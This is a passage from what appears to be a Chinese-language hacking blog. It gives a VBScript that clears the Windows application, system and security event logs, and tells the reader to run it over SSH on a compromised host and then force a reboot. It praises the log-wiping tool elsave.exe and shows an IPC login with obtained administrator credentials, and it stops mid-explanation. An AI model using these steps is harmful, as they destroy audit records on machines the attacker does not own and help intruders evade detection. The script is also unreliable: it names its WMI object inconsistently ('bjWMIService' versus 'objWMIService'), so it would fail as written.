cleanevent.vbs strComputer = "." Set bjWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate,(Backup)}!\\" & _ strComputer & "\root\cimv2") dim mylogs(3) mylogs(1)="application" mylogs(2)="system" mylogs(3)="security" for Each logs in mylogs Set colLogFiles = objWMIService.ExecQuery _ ("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'") For Each objLogfile in colLogFiles objLogFile.ClearEventLog() Next next
幸好还之前装了SSH,可以连接进去执行脚本。
c:\cleanevent.vbs
c:\shutdown -f -r
就OK了。
说到这不得不提到流光之父安全软件泰斗--小榕。
他曾发布过一个工具:elsave.exe
首先利用获得的管理员账号与对方建立ipc会话,net use \\ip pass /user: user